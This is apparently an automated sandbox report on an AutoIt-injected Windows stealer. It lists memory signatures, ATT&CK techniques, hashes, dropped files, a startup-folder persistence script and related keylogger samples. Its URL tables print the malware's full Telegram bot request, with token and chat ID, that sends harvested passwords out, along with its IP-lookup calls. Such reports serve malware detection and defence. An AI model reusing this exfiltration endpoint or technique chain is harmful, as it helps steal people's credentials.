Source: Yara match	File source: 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 6180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lustring.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 5048, type: MEMORYSTR

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00271204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00271204
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00271806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00271806
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00161204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_00161204
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00161806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00161806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	1 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	127 System Information Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	321 Security Software Discovery	SSH	3 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	111 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
eLo1khn7DQ.exe	53%	Virustotal		Browse
eLo1khn7DQ.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
eLo1khn7DQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\done\lustring.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\done\lustring.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\done\lustring.exe	53%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.64.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://api.telegram.org/bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804810800&caption=user%20/%20Passwords%20/%208.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.4818118474.0000000002B25000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189x	RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7913474358:AAGbk3vpVDyjWuynj6-s1PXT2BxohDfzNdA/sendDocument?chat_id=7804	RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	RegSvcs.exe, 00000003.00000002.4818118474.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002EAE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.4818118474.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DA3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	lustring.exe, 00000002.00000002.2407127647.0000000001390000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4816616271.0000000000403000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B03000.00000004.00000800.00020000.00000000.sdmp, lustring.exe, 00000007.00000002.2545717519.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4818140567.0000000002DD3000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587854
Start date and time:	2025-01-10 18:36:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	eLo1khn7DQ.exe renamed because original name is a hash value
Original Sample Name:	007c44293c94aaad7af63741f5e50ea655d09f680116856393bd58487f3784e2.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 54 Number of non-executed functions: 288
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:38:06	API Interceptor	12530205x Sleep call for process: RegSvcs.exe modified
18:38:00	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse
104.21.64.1	4sfN3Gx1vO.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/w7eo/
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/3u0p/
	Sales Acknowledgement - HES #982323.pdf	Get hash	malicious	Unknown	Browse	ordrr.statementquo.com/QCbxA/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	adsfirm.com/administrator/index.php
	PO2412010.exe	Get hash	malicious	FormBook	Browse	www.bser101pp.buzz/v89f/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.80.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.96.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
checkip.dyndns.com	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
api.telegram.org	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VIAmJUhQ54.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	PO#17971.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
UTMEMUS	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	New Order-090125.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	B7N48hmO78.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	#U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
CLOUDFLARENETUS	Encrypted_Archive_2025_LHC1W64SMW.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.96.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	secured File__esperion.com.html	Get hash	malicious	Phisher	Browse	104.17.25.14
	secured File__esperion.com.html	Get hash	malicious	Phisher	Browse	104.17.25.14
	https://www.depoqq.win/geno	Get hash	malicious	Unknown	Browse	104.18.27.193
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	phish_alert_sp2_2.0.0.0 (1).eml	Get hash	malicious	Unknown	Browse	104.18.32.25

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	3WgNXsWvMO.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	SBkuP3ACSA.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	v3tK92KcJV.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	zAK7HHniGW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	MtxN2qEWpW.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.64.1
	b5JCISnBV1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
3b5074b1b5d032e5620f69f9f700ff0e	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	MzqLQjCwrw.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	grW5hyK960.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	r5yYt97sfB.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	RmIYOfX0yO.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	8nkdC8daWi.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2V7usxd7Vc.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	ID_Badge_Policy.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	149.154.167.220
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\eLo1khn7DQ.exe
File Type:	data
Category:	dropped
Size (bytes):	68916
Entropy (8bit):	7.9191041906025434
Encrypted:	false
SSDEEP:	1536:/bsy+XXgSIvbHCIJvHpjI105AYcDdeNDKAfH5eQcDKBme+cll:zsPQS0GuOKu7MN1i+QI
MD5:	3D7BCB09E410547B362B6AF739F64C33
SHA1:	E15280670396F04282EF55D264EF9C588F959108
SHA-256:	57A37FC2CBD8A1D3CC2A5F754DB00EB7AC43C5B7A4E637D23403080FC8A5D481
SHA-512:	2F59CAB18360236D2C7408CF306E455941B75E56A055B4A16E0B8D67263EF7A8F01F407F6EB6A1DF087335252F75FC4BCDF04C1260B1C59998481AA5456A9442
Malicious:	false
Reputation:	low
Preview:	EA06..n...{.Z.R.N..).No&s1.M.T.%NmR.....".P..&..d.m9.....K...H.l.R.........h....?...n..g .....r.V...{l.MX.H...tb7e.....f.^..(.)..T..z]+.r.x@.5...3.v.S.T.tj..f+..R.t..24..b.S.\.!.E^.A...@..ZJ..I...J.......L.6..J...(....n&...........?..E..<.......W9.J..7..2...v.<....e.X......O.Q.m.z...@...@.....6z..UD.l.T..>...%e.Kd.]..X..q.Y..v.6W...?.J.7..^.{.]X....(.i..s).M.^_.NmQ.6".zE.a..S..........o..{!.....0.M&.el..S..b..lE...0..h.6'..e..D..(...b...N..I(....6'........(...f.7.Q..Y.B.f.R...~zOs.M....2{B....J..O...Uz...d.Q....m=..&t...y.Q....J.S.Q).z.^w..Ngt..2.B..6.."....j..#T........Sh.9.J.B.G$.Z-B.z.M.i..m9..'.m..(.X..........e.!H..6..m..H......\.l....\.7..raK.v..y...5.S.7.URe<..i.y.6.i.K(..EVO.U+...Z.\|.M.3zD~.M.Uf....L.."5..R.....I.N.H.......b..%V.t.`.. ...29$..jsj..0.U..o.R.D.u/.I..#..M...vfmz..(...2...o...96.Sh.....P.@).z.2...)c..m....R.ERkl.U......D..&.D..R....J........V.C.3..v9>....N].J..u....%.m&.Z%.7.S........tZ.J.5.S.6i..kJ..i.J.....R(

C:\Users\user\AppData\Local\Temp\autA05E.tmp

Download File

Process:	C:\Users\user\AppData\Local\done\lustring.exe
File Type:	data
Category:	dropped
Size (bytes):	68916
Entropy (8bit):	7.9191041906025434
Encrypted:	false
SSDEEP:	1536:/bsy+XXgSIvbHCIJvHpjI105AYcDdeNDKAfH5eQcDKBme+cll:zsPQS0GuOKu7MN1i+QI
MD5:	3D7BCB09E410547B362B6AF739F64C33
SHA1:	E15280670396F04282EF55D264EF9C588F959108
SHA-256:	57A37FC2CBD8A1D3CC2A5F754DB00EB7AC43C5B7A4E637D23403080FC8A5D481
SHA-512:	2F59CAB18360236D2C7408CF306E455941B75E56A055B4A16E0B8D67263EF7A8F01F407F6EB6A1DF087335252F75FC4BCDF04C1260B1C59998481AA5456A9442
Malicious:	false
Reputation:	low
Preview:	EA06..n...{.Z.R.N..).No&s1.M.T.%NmR.....".P..&..d.m9.....K...H.l.R.........h....?...n..g .....r.V...{l.MX.H...tb7e.....f.^..(.)..T..z]+.r.x@.5...3.v.S.T.tj..f+..R.t..24..b.S.\.!.E^.A...@..ZJ..I...J.......L.6..J...(....n&...........?..E..<.......W9.J..7..2...v.<....e.X......O.Q.m.z...@...@.....6z..UD.l.T..>...%e.Kd.]..X..q.Y..v.6W...?.J.7..^.{.]X....(.i..s).M.^_.NmQ.6".zE.a..S..........o..{!.....0.M&.el..S..b..lE...0..h.6'..e..D..(...b...N..I(....6'........(...f.7.Q..Y.B.f.R...~zOs.M....2{B....J..O...Uz...d.Q....m=..&t...y.Q....J.S.Q).z.^w..Ngt..2.B..6.."....j..#T........Sh.9.J.B.G$.Z-B.z.M.i..m9..'.m..(.X..........e.!H..6..m..H......\.l....\.7..raK.v..y...5.S.7.URe<..i.y.6.i.K(..EVO.U+...Z.\|.M.3zD~.M.Uf....L.."5..R.....I.N.H.......b..%V.t.`.. ...29$..jsj..0.U..o.R.D.u/.I..#..M...vfmz..(...2...o...96.Sh.....P.@).z.2...)c..m....R.ERkl.U......D..&.D..R....J........V.C.3..v9>....N].J..u....%.m&.Z%.7.S........tZ.J.5.S.6i..kJ..i.J.....R(

C:\Users\user\AppData\Local\Temp\autD614.tmp

Download File

Process:	C:\Users\user\AppData\Local\done\lustring.exe
File Type:	data
Category:	dropped
Size (bytes):	68916
Entropy (8bit):	7.9191041906025434
Encrypted:	false
SSDEEP:	1536:/bsy+XXgSIvbHCIJvHpjI105AYcDdeNDKAfH5eQcDKBme+cll:zsPQS0GuOKu7MN1i+QI
MD5:	3D7BCB09E410547B362B6AF739F64C33
SHA1:	E15280670396F04282EF55D264EF9C588F959108
SHA-256:	57A37FC2CBD8A1D3CC2A5F754DB00EB7AC43C5B7A4E637D23403080FC8A5D481
SHA-512:	2F59CAB18360236D2C7408CF306E455941B75E56A055B4A16E0B8D67263EF7A8F01F407F6EB6A1DF087335252F75FC4BCDF04C1260B1C59998481AA5456A9442
Malicious:	false
Reputation:	low
Preview:	EA06..n...{.Z.R.N..).No&s1.M.T.%NmR.....".P..&..d.m9.....K...H.l.R.........h....?...n..g .....r.V...{l.MX.H...tb7e.....f.^..(.)..T..z]+.r.x@.5...3.v.S.T.tj..f+..R.t..24..b.S.\.!.E^.A...@..ZJ..I...J.......L.6..J...(....n&...........?..E..<.......W9.J..7..2...v.<....e.X......O.Q.m.z...@...@.....6z..UD.l.T..>...%e.Kd.]..X..q.Y..v.6W...?.J.7..^.{.]X....(.i..s).M.^_.NmQ.6".zE.a..S..........o..{!.....0.M&.el..S..b..lE...0..h.6'..e..D..(...b...N..I(....6'........(...f.7.Q..Y.B.f.R...~zOs.M....2{B....J..O...Uz...d.Q....m=..&t...y.Q....J.S.Q).z.^w..Ngt..2.B..6.."....j..#T........Sh.9.J.B.G$.Z-B.z.M.i..m9..'.m..(.X..........e.!H..6..m..H......\.l....\.7..raK.v..y...5.S.7.URe<..i.y.6.i.K(..EVO.U+...Z.\|.M.3zD~.M.Uf....L.."5..R.....I.N.H.......b..%V.t.`.. ...29$..jsj..0.U..o.R.D.u/.I..#..M...vfmz..(...2...o...96.Sh.....P.@).z.2...)c..m....R.ERkl.U......D..&.D..R....J........V.C.3..v9>....N].J..u....%.m&.Z%.7.S........tZ.J.5.S.6i..kJ..i.J.....R(

C:\Users\user\AppData\Local\Temp\ophiolatrous

Download File

Process:	C:\Users\user\Desktop\eLo1khn7DQ.exe
File Type:	data
Category:	dropped
Size (bytes):	93696
Entropy (8bit):	6.895691231556073
Encrypted:	false
SSDEEP:	1536:GoUXEQxqP94YxNU7rVUrAeUr0rkqSJNGg5CREK7byHj1j+GMHeLYOjX/dP:GXRxyU7rVUrAeUrwkLNGgk7byD1j+Pk1
MD5:	8F827D1B010DCE6C9998102EF340431D
SHA1:	970712E281C20339E857C47ADB15A2D81E780367
SHA-256:	048B46F6923298E35AF3992B73BEC0EB5D932538B9D7F2BDC6D848A9C7F16E9B
SHA-512:	59F51E310DADC7A2DD0248A130CBBFBB996F53C0E68B521D4EFD9B2C111D14C40B22999BE72999D3E36171FE4150164EAB55AE7256DAC74692932FE6792206E9
Malicious:	false
Reputation:	low
